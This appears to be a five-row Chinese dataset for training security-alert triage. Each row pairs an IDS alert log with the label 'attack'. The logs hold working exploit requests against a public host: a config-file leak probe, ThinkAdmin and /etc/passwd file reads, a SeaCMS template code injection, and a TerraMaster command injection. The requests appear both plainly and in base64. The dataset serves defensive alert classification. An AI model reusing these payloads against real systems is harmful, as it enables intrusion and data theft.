instruction
stringclasses 1
value | input
stringlengths 2.79k
12.9k
| output
stringclasses 2
values |
---|---|---|
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688137", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732688137, "vuln_harm": "攻击者通过漏洞可以获取数据库账户密码,以获取数据库权限。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "", "hit_end": 20, "uri": "/mysql_config.ini", "dport": 30001, "vuln_name": "泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞", "rsp_status": 0, "code_language": "", "solution": "关注官方网站,及时更新安全补丁。", "hit_start": 0, "detail_info": "泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。泛微OA e-office平台mysql_config.ini文件可未授权访问,攻击者通过漏洞可以获取数据库权限。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。泛微OA e-office平台mysql_config.ini文件可未授权访问,攻击者通过漏洞可以获取数据库权限。", "public_date": "2022-12-21 14:34:04", "sport": 12126}, "detail_info": "泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。泛微OA e-office平台mysql_config.ini文件可未授权访问,攻击者通过漏洞可以获取数据库权限。", "file_md5": "81f76b671c722ed73b42317167a77610", "rule_key": "webids", "api": "218.76.15.56:30001/mysql_config.ini", "first_access_time": "2024-11-27 14:15:37", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "d780bcaa369b7681d34a96090e1c61cb", "xff": "", "vuln_desc": "泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。泛微OA e-office平台mysql_config.ini文件可未授权访问,攻击者通过漏洞可以获取数据库权限。", "attack_chain": "0x02020000", "vuln_harm": "攻击者通过漏洞可以获取数据库账户密码,以获取数据库权限。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688116", "code_language": "", "public_date": "2022-12-21 14:34:04", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "20", "h_proto_version": "HTTP/1.1", "uri": "/mysql_config.ini", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021412", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞", "attack_type": "信息泄露", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "关注官方网站,及时更新安全补丁。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC9teXNxbF9jb25maWcuaW5pIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkRudDogMQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_baaad89bea46909b3986b41ec642ecf8", "access_time": "2024-11-27 14:15:37", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/mysql_config.ini", "src_mac": "00:94:a1:5e:6e:87", "file_name": "mysql_config.ini", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /mysql_config.ini HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268571666-泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12126", "h_url": "/mysql_config.ini"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688136", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "文件读取", "_origin": {"write_date": 1732688136, "vuln_harm": "ThinkAdmin v6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "", "hit_end": 45, "uri": "/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34", "dport": 30001, "vuln_name": "ThinkAdmin 任意文件读取漏洞(CVE-2020-25540)", "rsp_status": 0, "code_language": "", "solution": "升级到最新版,升级链接:https://github.com/zoujingli/ThinkAdmin/", "hit_start": 25, "detail_info": "ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统。ThinkAdmin v6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。\r\n影响范围\r\nThinkadmin ≤ 2020.08.03.01", "xff": "", "sip": "223.160.174.104", "vuln_desc": "ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统。ThinkAdmin v6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。\r\n影响范围\r\nThinkadmin ≤ 2020.08.03.01", "public_date": "2021-03-26 17:42:53", "sport": 11769}, "detail_info": "ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统。ThinkAdmin v6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。\r\n影响范围\r\nThinkadmin ≤ 2020.08.03.01", "file_md5": "3945e22d97895f89748c27e82b188450", "rule_key": "webids", "api": "218.76.15.56:30001/admin.html", "first_access_time": "2024-11-27 14:15:36", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "ThinkAdmin 任意文件读取漏洞(CVE-2020-25540)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "4ea465c40e1b0d465fcac8e74f4a1c3a", "xff": "", "vuln_desc": "ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统。ThinkAdmin v6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。\r\n影响范围\r\nThinkadmin ≤ 2020.08.03.01", "attack_chain": "0x02020000", "vuln_harm": "ThinkAdmin v6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688116", "code_language": "", "public_date": "2021-03-26 17:42:53", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "45", "h_proto_version": "HTTP/1.1", "uri": "/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020c20", "s": "admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "ThinkAdmin 任意文件读取漏洞(CVE-2020-25540)", "attack_type": "文件读取", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "升级到最新版,升级链接:https://github.com/zoujingli/ThinkAdmin/", "hit_start": "25", "skyeye_id": "", "payload": {"req_header": "R0VUIC9hZG1pbi5odG1sP3M9YWRtaW4vYXBpLlVwZGF0ZS9nZXQvZW5jb2RlLzM0MzkycTMwMngycjFiMzczODJwMzgyeDJyMWIxYTFhMWIyeDMyMnMydDNjMWEzNDJ3MzQgSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41NjozMDAwMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgcnY6NzguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83OC4wDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KRG50OiAxDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_7c5c3c931474846dc287f8c1e1c09b34", "access_time": "2024-11-27 14:15:36", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16100000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/admin.html", "src_mac": "00:94:a1:5e:6e:87", "file_name": "admin.html", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34 HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569632-ThinkAdmin 任意文件读取漏洞(CVE-2020-25540)", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "11769", "h_url": "/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688123", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "配置不当/错误", "_origin": {"write_date": 1732688123, "vuln_harm": "此类请求行为一旦成功,攻击者可通过访问敏感信息实施进一步的攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "其他", "hit_end": 216, "uri": "//etc/passwd", "dport": 30001, "vuln_name": "发现尝试请求Linux下敏感文件", "rsp_status": 0, "code_language": "其他", "solution": "对此类敏感请求进行拦截。", "hit_start": 196, "detail_info": "发现在HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "发现在HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "public_date": "2018-08-30 16:27:11", "sport": 11767}, "detail_info": "发现在HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001//etc/passwd", "first_access_time": "2024-11-27 14:15:23", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现尝试请求Linux下敏感文件", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "7e0dbaa5943b4ce9063c03616affb27b", "xff": "", "vuln_desc": "发现在HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "attack_chain": "0x01020000", "vuln_harm": "此类请求行为一旦成功,攻击者可通过访问敏感信息实施进一步的攻击。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688104", "code_language": "其他", "public_date": "2018-08-30 16:27:11", "skyeye_serial_num": "QbJK/8ze/", "site_app": "其他", "super_attack_chain": "0x01000000", "hit_end": "216", "h_proto_version": "HTTP/1.1", "uri": "//etc/passwd", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020571", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "发现尝试请求Linux下敏感文件", "attack_type": "默认配置不当", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "对此类敏感请求进行拦截。", "hit_start": "196", "skyeye_id": "", "payload": {"req_header": "R0VUIC8vZXRjL3Bhc3N3ZCBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjU2OjMwMDAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo3OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzc4LjANCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_c479b51d7be58f7f377d713d10120b06", "access_time": "2024-11-27 14:15:23", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "160C0000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "//etc/passwd", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET //etc/passwd HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567921-发现尝试请求Linux下敏感文件", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "11767", "h_url": "//etc/passwd"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688121", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732688121, "vuln_harm": "恶意的攻击者可以通过该漏洞执行代码。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "", "hit_end": 27, "uri": "/search.php?searchtype=5", "dport": 30001, "vuln_name": "seacms search.php 代码执行漏洞", "rsp_status": 0, "code_language": "", "solution": "厂商暂未发布补丁信息,请及时关注厂商信息", "hit_start": 7, "detail_info": "seacms search.php 页面存在代码执行。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "seacms search.php 页面存在代码执行。", "public_date": "2024-10-28 18:03:59", "sport": 11774}, "detail_info": "seacms search.php 页面存在代码执行。", "file_md5": "e0080b9d6ffa35acb85312bf99a557f2", "rule_key": "webids", "api": "218.76.15.56:30001/search.php", "first_access_time": "2024-11-27 14:15:21", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "seacms search.php 代码执行漏洞", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "f1cc2ba073a920f34f27f5a0bff4690c", "xff": "", "vuln_desc": "seacms search.php 页面存在代码执行。", "attack_chain": "0x02010000", "vuln_harm": "恶意的攻击者可以通过该漏洞执行代码。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688102", "code_language": "", "searchtype": "5", "public_date": "2024-10-28 18:03:59", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "27", "h_proto_version": "HTTP/1.1", "uri": "/search.php?searchtype=5", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021eae", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "seacms search.php 代码执行漏洞", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "厂商暂未发布补丁信息,请及时关注厂商信息", "hit_start": "7", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvc2VhcmNoLnBocD9zZWFyY2h0eXBlPTUgSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41NjozMDAwMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgcnY6NzguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83OC4wDQpDb250ZW50LUxlbmd0aDogNzcNCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KRG50OiAxDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K", "req_body": "c2VhcmNodHlwZT01Jm9yZGVyPX17ZW5kIGlmfSB7aWY6MSlwcmludCgyMDIxMjQxMDIlMmIyMDcwNzc3NzIpO2lmKDF9e2VuZCBpZn0=", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_129ee1328ff22d414b877751d8ed35fc", "access_time": "2024-11-27 14:15:21", "content-length": "77", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/search.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "search.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /search.php?searchtype=5 HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 77\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "searchtype=5&order=}{end if} {if:1)print(202124102%2b207077772);if(1}{end if}", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268574382-seacms search.php 代码执行漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "11774", "h_url": "/search.php?searchtype=5"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688121", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "命令执行", "_origin": {"write_date": 1732688121, "vuln_harm": "TerraMaster TOS 存在远程命令执行漏洞,攻击者可以利用漏洞在目标上执行远程命令。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "", "hit_end": 66, "uri": "/include/exportUser.php?type=3&cla=application&func=_exec&opt=(expr%20868588204%20%2B%20863385752)%3Eylooluckmy", "dport": 30001, "vuln_name": "TerraMaster TOS 远程命令执行漏洞(CVE-2020-15568)", "rsp_status": 0, "code_language": "", "solution": "官方已经修复了该漏洞,请升级到最新版本:https://www.terra-master.com/", "hit_start": 46, "detail_info": "TerraMaster TOS 存在远程命令执行漏洞,攻击者可以利用漏洞在目标上执行远程命令。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "TerraMaster TOS 存在远程命令执行漏洞,攻击者可以利用漏洞在目标上执行远程命令。", "public_date": "2022-07-20 15:31:58", "sport": 11777}, "detail_info": "TerraMaster TOS 存在远程命令执行漏洞,攻击者可以利用漏洞在目标上执行远程命令。", "file_md5": "7982a7aa005059b080f9cc0f320733e0", "cla": "application", "rule_key": "webids", "api": "218.76.15.56:30001/include/exportUser.php", "first_access_time": "2024-11-27 14:15:21", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "TerraMaster TOS 远程命令执行漏洞(CVE-2020-15568)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "87b6969cfe1aa3a5017783ce9adf503a", "xff": "", "vuln_desc": "TerraMaster TOS 存在远程命令执行漏洞,攻击者可以利用漏洞在目标上执行远程命令。", "attack_chain": "0x02020000", "vuln_harm": "TerraMaster TOS 存在远程命令执行漏洞,攻击者可以利用漏洞在目标上执行远程命令。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688102", "code_language": "", "public_date": "2022-07-20 15:31:58", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "66", "h_proto_version": "HTTP/1.1", "uri": "/include/exportUser.php?type=3&cla=application&func=_exec&opt=(expr%20868588204%20%2B%20863385752)%3Eylooluckmy", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002106b", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "TerraMaster TOS 远程命令执行漏洞(CVE-2020-15568)", "attack_type": "命令执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "官方已经修复了该漏洞,请升级到最新版本:https://www.terra-master.com/", "hit_start": "46", "skyeye_id": "", "payload": {"req_header": "R0VUIC9pbmNsdWRlL2V4cG9ydFVzZXIucGhwP3R5cGU9MyZjbGE9YXBwbGljYXRpb24mZnVuYz1fZXhlYyZvcHQ9KGV4cHIlMjA4Njg1ODgyMDQlMjAlMkIlMjA4NjMzODU3NTIpJTNFeWxvb2x1Y2tteSBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjU2OjMwMDAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo3OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzc4LjANCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "opt": "(expr 868588204 + 863385752)>ylooluckmy", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_88217364c86fb026cf304b471582a6ff", "access_time": "2024-11-27 14:15:21", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16090000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/include/exportUser.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "exportUser.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(expr%20868588204%20%2B%20863385752)%3Eylooluckmy HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "func": "_exec", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268570731-TerraMaster TOS 远程命令执行漏洞(CVE-2020-15568)", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "11777", "h_url": "/include/exportUser.php?type=3&cla=application&func=_exec&opt=(expr%20868588204%20%2B%20863385752)%3Eylooluckmy"} | 攻击 |
